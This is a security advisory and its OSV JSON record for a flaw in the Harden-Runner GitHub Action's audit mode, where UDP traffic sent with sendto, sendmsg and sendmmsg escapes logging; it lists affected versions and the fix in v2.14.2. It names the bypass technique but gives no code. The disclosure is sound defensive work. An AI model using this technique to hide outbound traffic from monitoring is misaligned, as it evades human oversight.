GHSA-CPMJ-H4F6-R6PQ
Vulnerability from github – Published: 2026-02-09 17:19 – Updated: 2026-02-09 22:39Summary
A security vulnerability has been identified in the Harden-Runner GitHub Action (Community Tier) that allows outbound network connections to evade audit logging. Specifically, outbound traffic using the sendto, sendmsg, and sendmmsg socket system calls can bypass detection and logging when using egress-policy: audit.
Note: This vulnerability only affects audit mode. When using egress-policy: block, these connections are properly blocked. It requires the attacker to already have code execution capabilities within the GitHub Actions workflow (e.g., through workflow injection or compromised dependencies)
Affected Versions
- Harden-Runner Community Tier: All versions prior to v2.14.2
- Harden-Runner Enterprise Tier: NOT AFFECTED
Severity
Medium - This vulnerability affects audit logging capabilities but requires the attacker to already have code execution within the workflow.
Impact
When Harden-Runner is configured in audit mode (egress-policy: audit), attackers with the ability to execute arbitrary code in a workflow can:
- Send outbound network traffic without generating audit logs
- Bypass network monitoring for UDP-based communications
Important: This vulnerability requires the attacker to already have code execution capabilities within the GitHub Actions workflow (e.g., through workflow injection or compromised dependencies).
Technical Details
The vulnerability stems from incomplete monitoring coverage of certain socket-related system calls. Specifically, the following system calls can be used to send UDP traffic without triggering audit events:
-
sendto() -
sendmsg() -
sendmmsg()
An attacker with code execution in a workflow can compile and execute native code that uses these system calls to establish covert communication channels.
Affected Users
This vulnerability ONLY affects users of the Harden-Runner Community Tier.
The Harden-Runner Enterprise Tier is NOT vulnerable to this bypass technique.
Remediation
For Community Tier Users
Upgrade to Harden-Runner v2.14.2 or later. This version includes fixes for the logging bypass vulnerability.
For Enterprise Tier Users
No action required. Enterprise tier customers are not affected by this vulnerability.
Credit
We would like to thank Devansh Batham for responsibly disclosing this vulnerability through our security reporting process. Devansh was communicative throughout the process and verified the fix before the fix before it was made public.
{
"affected": [
{
"package": {
"ecosystem": "GitHub Actions",
"name": "step-security/harden-runner"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.14.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-25598"
],
"database_specific": {
"cwe_ids": [
"CWE-221",
"CWE-778",
"CWE-863"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-09T17:19:14Z",
"nvd_published_at": "2026-02-09T20:15:58Z",
"severity": "MODERATE"
},
"details": "## Summary \n\nA security vulnerability has been identified in the Harden-Runner GitHub Action (Community Tier) that allows outbound network connections to evade audit logging. Specifically, outbound traffic using the `sendto`, `sendmsg`, and `sendmmsg` socket system calls can bypass detection and logging when using `egress-policy: audit`. \n\n**Note:** This vulnerability only affects audit mode. When using `egress-policy: block`, these connections are properly blocked. It requires the attacker to already have code execution capabilities within the GitHub Actions workflow (e.g., through workflow injection or compromised dependencies)\n\n## Affected Versions \n\n- Harden-Runner Community Tier: All versions prior to v2.14.2 \n- Harden-Runner Enterprise Tier: **NOT AFFECTED** \n\n## Severity \n\n**Medium** - This vulnerability affects audit logging capabilities but requires the attacker to already have code execution within the workflow. \n\n## Impact \n\nWhen Harden-Runner is configured in audit mode (`egress-policy: audit`), attackers with the ability to execute arbitrary code in a workflow can: \n- Send outbound network traffic without generating audit logs \n- Bypass network monitoring for UDP-based communications \n\n**Important:** This vulnerability requires the attacker to already have code execution capabilities within the GitHub Actions workflow (e.g., through workflow injection or compromised dependencies). \n\n## Technical Details \n\nThe vulnerability stems from incomplete monitoring coverage of certain socket-related system calls. Specifically, the following system calls can be used to send UDP traffic without triggering audit events: \n\n- `sendto()` \n\n- `sendmsg()` \n\n- `sendmmsg()` \n\nAn attacker with code execution in a workflow can compile and execute native code that uses these system calls to establish covert communication channels. \n\n## Affected Users \n\n**This vulnerability ONLY affects users of the Harden-Runner Community Tier.** \n\nThe Harden-Runner Enterprise Tier is **NOT vulnerable** to this bypass technique. \n\n## Remediation \n\n### For Community Tier Users \n \n**Upgrade to Harden-Runner v2.14.2 or later.** This version includes fixes for the logging bypass vulnerability. \n\n### For Enterprise Tier Users \n\nNo action required. Enterprise tier customers are not affected by this vulnerability. \n\n## Credit \n\nWe would like to thank [Devansh Batham](https://github.com/devanshbatham) for responsibly disclosing this vulnerability through our security reporting process. Devansh was communicative throughout the process and verified the fix before the fix before it was made public.",
"id": "GHSA-cpmj-h4f6-r6pq",
"modified": "2026-02-09T22:39:28Z",
"published": "2026-02-09T17:19:14Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/step-security/harden-runner/security/advisories/GHSA-cpmj-h4f6-r6pq"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25598"
},
{
"type": "WEB",
"url": "https://github.com/step-security/harden-runner/commit/5ef0c079ce82195b2a36a210272d6b661572d83e"
},
{
"type": "PACKAGE",
"url": "https://github.com/step-security/harden-runner"
},
{
"type": "WEB",
"url": "https://github.com/step-security/harden-runner/releases/tag/v2.14.2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Harden-Runner: Bypassing Logging of Outbound Connections Using sendto, sendmsg, and sendmmsg in Harden-Runner (Community Tier)"
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.